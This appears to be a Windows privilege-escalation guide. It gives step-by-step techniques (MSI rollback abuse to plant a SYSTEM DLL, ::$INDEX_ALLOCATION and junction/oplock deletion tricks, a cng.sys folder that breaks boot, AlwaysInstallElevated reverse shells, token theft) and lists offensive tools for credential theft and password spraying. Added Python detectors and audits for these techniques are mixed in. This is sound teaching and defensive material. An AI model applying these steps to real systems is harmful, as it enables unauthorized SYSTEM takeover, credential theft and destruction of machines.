From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP
Technique mentioned in this blog post with the exploit code available here.
The attack basically consists of abusing the rollback feature of Windows Installer to replace legitimate files with malicious ones during the uninstall process. For this the attacker needs to create a malicious MSI installer that will be used to hijack the C:\Config.Msi folder, which will later be used by Windows Installer to store rollback files during the uninstallation of other MSI packages, where the rollback files would have been modified to contain the malicious payload.
The summarized technique is the following:
- Stage 1: Preparing for the Hijack (leave C:\Config.Msi empty)
  - Step 1: Install the MSI
    - Create an .msi that installs a harmless file (e.g., dummy.txt) into a writable folder (TARGETDIR).
    - Mark the installer as "UAC Compliant", so a non-admin user can run it.
    - Keep a handle open to the file after install.
  - Step 2: Begin Uninstall
    - Uninstall the same .msi.
    - The uninstall process starts moving files to C:\Config.Msi and renaming them to .rbf files (rollback backups).
    - Poll the open file handle using GetFinalPathNameByHandle to detect when the file becomes C:\Config.Msi\<random>.rbf.
  - Step 3: Custom Syncing
    - The .msi includes a custom uninstall action (SyncOnRbfWritten) that:
      - Signals when the .rbf has been written.
      - Then waits on another event before continuing the uninstall.
  - Step 4: Block Deletion of .rbf
    - When signaled, open the .rbf file without FILE_SHARE_DELETE; this prevents it from being deleted.
    - Then signal back so the uninstall can finish.
    - Windows Installer fails to delete the .rbf, and because it cannot delete all the contents, C:\Config.Msi is not removed.
  - Step 5: Manually Delete .rbf
    - You (the attacker) delete the .rbf file manually.
    - Now C:\Config.Msi is empty, ready to be hijacked.
  At this point, trigger the SYSTEM-level arbitrary folder delete vulnerability to delete C:\Config.Msi.
- Stage 2: Replacing Rollback Scripts with Malicious Ones
  - Step 6: Recreate C:\Config.Msi with Weak ACLs
    - Recreate the C:\Config.Msi folder yourself.
    - Set weak DACLs (e.g., Everyone:F), and keep a handle open with WRITE_DAC.
  - Step 7: Run Another Install
    - Install the .msi again, with:
      - TARGETDIR: a writable location.
      - ERROROUT: a variable that triggers a forced failure.
    - This install will be used to trigger rollback again, which reads .rbs and .rbf.
  - Step 8: Monitor for .rbs
    - Use ReadDirectoryChangesW to monitor C:\Config.Msi until a new .rbs appears.
    - Capture its filename.
  - Step 9: Sync Before Rollback
    - The .msi contains a custom install action (SyncBeforeRollback) that:
      - Signals an event when the .rbs is created.
      - Then waits before continuing.
  - Step 10: Reapply Weak ACL
    - After receiving the .rbs created event:
      - Windows Installer reapplies strong ACLs to C:\Config.Msi.
      - But since you still have a handle with WRITE_DAC, you can reapply weak ACLs again.
    ACLs are only enforced when a handle is opened, so you can still write to the folder.
  - Step 11: Drop Fake .rbs and .rbf
    - Overwrite the .rbs file with a fake rollback script that tells Windows to:
      - Restore your .rbf file (malicious DLL) into a privileged location (e.g., C:\Program Files\Common Files\microsoft shared\ink\HID.DLL).
      - Drop your fake .rbf containing a malicious SYSTEM-level payload DLL.
  - Step 12: Trigger the Rollback
    - Signal the sync event so the installer resumes.
    - A type 19 custom action (ErrorOut) is configured to intentionally fail the install at a known point.
    - This causes rollback to begin.
  - Step 13: SYSTEM Installs Your DLL
    - Windows Installer:
      - Reads your malicious .rbs.
      - Copies your .rbf DLL into the target location.
    - You now have your malicious DLL in a SYSTEM-loaded path.
  - Final Step: Execute SYSTEM Code
    - Run a trusted auto-elevated binary (e.g., osk.exe) that loads the DLL you hijacked.
    - Boom: your code is executed as SYSTEM.
From Arbitrary File Delete/Move/Rename to SYSTEM EoP
The main MSI rollback technique (the previous one) assumes you can delete a whole folder (e.g., C:\Config.Msi). But what if your vulnerability only allows arbitrary file deletion?
You could exploit NTFS internals: every folder has a hidden alternate data stream called:
C:\SomeFolder::$INDEX_ALLOCATION
This stream stores the index metadata of the folder.
So, if you delete the ::$INDEX_ALLOCATION stream of a folder, NTFS removes the entire folder from the filesystem.
You can do this using standard file deletion APIs like:
DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");
Even though you are calling a file delete API, it deletes the folder itself.
From Folder Contents Delete to SYSTEM EoP
What if your primitive does not let you delete arbitrary files/folders, but it does let you delete the contents of an attacker-controlled folder?
- Step 1: Set up a bait folder and file
  - Create:
    C:\temp\folder1
  - Inside it:
    C:\temp\folder1\file1.txt
- Step 2: Place an oplock on file1.txt
  - This oplock pauses execution when a privileged process tries to delete file1.txt.
    // pseudo-code
    RequestOplock("C:\\temp\\folder1\\file1.txt");
    WaitForDeleteToTriggerOplock();
- Step 3: Trigger a SYSTEM process (e.g., SilentCleanup)
  - This process scans folders (e.g., %TEMP%) and tries to delete their contents.
  - When it reaches file1.txt, the oplock triggers and hands control to your callback.
- Step 4: Inside the oplock callback, redirect the deletion
  - Option A: Move file1.txt elsewhere
    - This leaves folder1 empty without breaking the oplock.
    - Do not delete file1.txt directly, as that would release the oplock early.
  - Option B: Turn folder1 into a junction:
    REM folder1 is now a junction to \RPC Control (non-filesystem namespace)
    mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control
  - Option C: Create a symlink in \RPC Control:
    // Make file1.txt point to a sensitive folder stream (pseudo-code)
    CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")
    This targets the internal NTFS stream that stores the folder's metadata; deleting it deletes the folder.
- Step 5: Release the oplock
  - The SYSTEM process continues and tries to delete file1.txt.
  - But now, because of the junction + symlink, it actually deletes:
    C:\Config.Msi::$INDEX_ALLOCATION
Result: C:\Config.Msi is deleted by SYSTEM.
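As an added detection example (not code from the original page), the following Python flags the two file-system operations that the arbitrary-file-delete and folder-contents-delete techniques above both rely on: a delete whose target is a directory's ::$INDEX_ALLOCATION stream, and a reparse point that points into \RPC Control. The records are constructed, with assumed field names (image, user, operation, target, link_target), not real Sysmon or ProcMon output.

```python
import re
from dataclasses import dataclass

# Constructed file-operation records with assumed field names; they are not
# real Sysmon or ProcMon output. 'link_target' is only set for reparse points.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe", "user": r"NT AUTHORITY\SYSTEM",
     "operation": "Delete", "target": r"C:\Config.Msi::$INDEX_ALLOCATION"},
    {"image": r"C:\Windows\System32\cmd.exe", "user": r"LAB\lowpriv",
     "operation": "CreateReparsePoint", "target": r"C:\temp\folder1",
     "link_target": r"\\?\GLOBALROOT\RPC Control"},
    {"image": r"C:\Windows\System32\svchost.exe", "user": r"NT AUTHORITY\SYSTEM",
     "operation": "Delete", "target": r"C:\Users\lowpriv\AppData\Local\Temp\cache.tmp"},
]

# A delete whose target is a directory's index stream removes the directory.
INDEX_STREAM_RE = re.compile(r"::\$INDEX_ALLOCATION$", re.IGNORECASE)
# A reparse point into the object-manager namespace used for symlink pivots.
RPC_CONTROL_RE = re.compile(r"\\RPC Control(\\|$)", re.IGNORECASE)
PRIVILEGED_USERS = {r"NT AUTHORITY\SYSTEM", r"NT AUTHORITY\LOCAL SERVICE",
                    r"NT AUTHORITY\NETWORK SERVICE"}


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    target: str
    privileged: bool  # True when the acting user is a service identity


def classify(event: dict) -> list[Finding]:
    """Return the detection rules one event matches (empty when benign)."""
    hits = []
    op, target = event["operation"], event["target"]
    privileged = event["user"] in PRIVILEGED_USERS
    if op == "Delete" and INDEX_STREAM_RE.search(target):
        hits.append(Finding("dir_delete_via_index_allocation", event["image"], target, privileged))
    if op == "CreateReparsePoint" and RPC_CONTROL_RE.search(event.get("link_target", "")):
        hits.append(Finding("reparse_point_to_rpc_control", event["image"], target, privileged))
    return hits


def scan(events: list[dict]) -> list[Finding]:
    """Run every rule over a batch of records, preserving event order."""
    return [f for e in events for f in classify(e)]
```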
From Arbitrary Folder Create to Persistent DoS
Use a primitive that lets you create an arbitrary folder as SYSTEM/admin, even if you cannot write files or set weak permissions.
Create a folder (not a file) with the name of a critical Windows driver, for example:
C:\Windows\System32\cng.sys
- This path normally corresponds to the cng.sys kernel-mode driver.
- If you pre-create it as a folder, Windows fails to load the real driver at boot.
- Then, when Windows tries to load cng.sys during boot and finds the folder, it cannot resolve the real driver and crashes or halts the boot.
- There is no fallback, and no recovery without external intervention (e.g., boot repair or disk access).
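An added audit check (not from the original page) for the condition just described: walk a System32-like directory and report every entry that is a directory but carries a driver or DLL file name, which is exactly the shape of the cng.sys folder trick. The demo builds a constructed layout in a temporary directory instead of touching the real C:\Windows\System32.

```python
import os
import tempfile

# Extensions that should only ever appear on files inside a system directory.
BINARY_EXTENSIONS = (".sys", ".dll", ".exe")


def find_shadowing_dirs(root: str) -> list[str]:
    """Return names of directories directly under `root` whose name looks like a
    binary (e.g. a folder called cng.sys). Such a folder prevents the real
    driver from ever being created or loaded at that path."""
    hits = []
    with os.scandir(root) as entries:
        for entry in entries:
            if entry.is_dir(follow_symlinks=False) and entry.name.lower().endswith(BINARY_EXTENSIONS):
                hits.append(entry.name)
    return sorted(hits)


def demo() -> list[str]:
    """Constructed layout: a real driver file, an unrelated folder and a folder
    squatting on a driver name. Returns the audit result for that layout."""
    with tempfile.TemporaryDirectory() as root:
        open(os.path.join(root, "ntfs.sys"), "wb").close()  # legitimate driver file
        os.mkdir(os.path.join(root, "drivers"))             # legitimate folder
        os.mkdir(os.path.join(root, "cng.sys"))             # folder squatting on a driver name
        return find_shadowing_dirs(root)


if __name__ == "__main__":
    print(demo())  # ['cng.sys']
```

On a real host the check would be run as `find_shadowing_dirs(r"C:\Windows\System32")` and any hit investigated before the next reboot.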
From High Integrity to System
New service
If you are already running in a High Integrity process, the path to SYSTEM can be as easy as creating and starting a new service:
sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename
Tip
When creating the service binary, make sure it is a valid service or that the binary performs the required actions quickly, because it will be killed within 20s if it is not a valid service.
AlwaysInstallElevated
From a High Integrity process you can try to enable the AlwaysInstallElevated registry entries and install a reverse shell using a .msi wrapper.
More information about the registry keys involved and how to install a .msi package here.
High + SeImpersonate privilege to System
You can find the code here.
From SeDebug + SeImpersonate to full token privileges
If you have those token privileges (you will probably find them in a process that is already High Integrity), you will be able to open almost any process (except protected processes) with the SeDebug privilege, copy the token of that process, and create an arbitrary process with that token.
Using this technique you usually select a process running as SYSTEM with all the token privileges (yes, you can find SYSTEM processes without all the token privileges).
You can find an example of code executing the proposed technique here.
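To audit which of the token privileges discussed above an account actually holds, here is an added Python parser (not the page's code) for the table printed by whoami /priv; the sample output is constructed. It maps the privileges to the escalation routes this page describes, so a reviewer can spot service accounts that should not carry them.

```python
import re

# Constructed sample of `whoami /priv` output; the column layout matches the real tool.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeDebugPrivilege                Debug programs                            Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
"""

# One table row: privilege name, free-text description, then the State column.
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privileges(text: str) -> dict[str, bool]:
    """Map privilege name -> True if Enabled, False if Disabled."""
    privs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def escalation_routes(privs: dict[str, bool]) -> list[str]:
    """Routes from this page whose prerequisites the token satisfies.
    A privilege that is present but Disabled still counts: its holder can
    enable it again with AdjustTokenPrivileges."""
    routes = []
    if "SeImpersonatePrivilege" in privs:
        routes.append("impersonation via named pipes (High + SeImpersonate)")
    if "SeDebugPrivilege" in privs and "SeImpersonatePrivilege" in privs:
        routes.append("token theft from a SYSTEM process (SeDebug + SeImpersonate)")
    return routes
```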
Named Pipes
This technique is used by meterpreter to escalate in getsystem. The technique consists of creating a pipe and then creating/abusing a service to write to that pipe. Then, the server that created the pipe using the SeImpersonate privilege will be able to impersonate the token of the pipe client (the service) and obtain SYSTEM privileges.
If you want to learn more about named pipes you should read this.
If you want to read an example of how to go from high integrity to System using named pipes you should read this.
Dll Hijacking
If you manage to hijack a dll being loaded by a process running as SYSTEM you will be able to execute arbitrary code with those permissions. Therefore Dll Hijacking is also useful for this kind of privilege escalation, and, moreover, it is far easier to achieve from a high integrity process, since you will have write permissions on the folders used to load dlls.
You can learn more about Dll hijacking here.
From Administrator or Network Service to System
- https://github.com/sailay1996/RpcSsImpersonator
- https://decoder.cloud/2020/05/04/from-network-service-to-system/
- https://github.com/decoder-it/NetworkServiceExploit
From LOCAL SERVICE or NETWORK SERVICE to full privs
Read: https://github.com/itm4n/FullPowers
More help
Useful tools
Best tool to look for Windows local privilege escalation vectors: WinPEAS
PS
PrivescCheck
PowerSploit-Privesc (PowerUp) - Checks for misconfigurations and sensitive files (check here). Detected.
JAWS - Checks for some misconfigurations and gathers info (check here).
privesc - Checks for misconfigurations
SessionGopher - Extracts saved session information for PuTTY, WinSCP, SuperPuTTY, FileZilla and RDP. Use -Thorough locally.
Invoke-WCMDump - Extracts credentials from Credential Manager. Detected.
DomainPasswordSpray - Sprays the passwords you gathered across the domain
Inveigh - Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.
WindowsEnum - Basic privesc enumeration
Sherlock - Searches for known privesc vulnerabilities (DEPRECATED in favour of Watson)
WINspect - Local checks (needs Admin rights)
Exe
Watson - Searches for known privesc vulnerabilities (needs to be compiled with VisualStudio) (precompiled)
SeatBelt - Enumerates the host looking for misconfigurations (more an info-gathering tool than a privesc tool) (needs to be compiled) (precompiled)
LaZagne - Extracts credentials from many pieces of software (precompiled exe on github)
SharpUP - Port of PowerUp to C#
Beroot - Checks for misconfigurations (precompiled executable on github). Not recommended. Does not work well on Win10.
Windows-Privesc-Check - Checks for possible misconfigurations (exe from python). Not recommended. Does not work well on Win10.
Bat
winPEASbat - A tool created based on this post (does not need accesschk to work properly, but can use it).
Local
Windows-Exploit-Suggester - Reads the output of systeminfo and recommends working exploits (local python)
Windows Exploit Suggester Next Generation - Reads the output of systeminfo and recommends working exploits (local python)
Meterpreter
multi/recon/local_exploit_suggestor
You need to compile the project using the correct version of .NET (see this). To see the .NET version installed on the victim host you can run:
C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line
References
- http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
- https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- HTB Reaper: Format-string leak + stack BOF to VirtualAlloc ROP (RCE) and kernel token theft
- Check Point Research: Tracking Silver Fox: Cat and Mouse in Kernel Shadows